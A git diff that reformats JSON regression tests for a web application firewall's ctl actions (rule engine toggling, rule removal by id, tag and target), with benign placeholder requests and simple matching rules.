"version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/x-www-form-urlencoded", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/x-www-form-urlencoded", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_engine.json b/test/test-cases/regression/action-ctl_rule_engine.json index 927b7077e8..bab93e2448 100644 --- a/test/test-cases/regression/action-ctl_rule_engine.json +++ b/test/test-cases/regression/action-ctl_rule_engine.json @@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off\"", @@ -46,45 +48,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly\"", @@ -92,222 +96,232 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On\"", "SecRule ARGS \"@contains test\" \"id:2,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (4)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (4)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (5)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (5)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,log,phase:3,block,deny,status:302,ctl:RuleEngine=DetectionOnly\"" ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_by_id.json index ba89561d57..86387d804e 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_id.json @@ -1,66 +1,88 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (1)", - "expected":{ - "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action..." + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action...", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json index 6cf2923d58..7434ec5598 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json @@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '2'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=tag123\"", "SecRule ARGS \"@contains test1\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test2\" \"id:2,pass,t:trim,tag:tag123\"", @@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '3'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=whee\"", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json index fce492bbac..57b630d581 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json @@ -1,167 +1,218 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (1)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (3)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", "Referer": "This is an attack" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", "referer": "This is an attack" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" 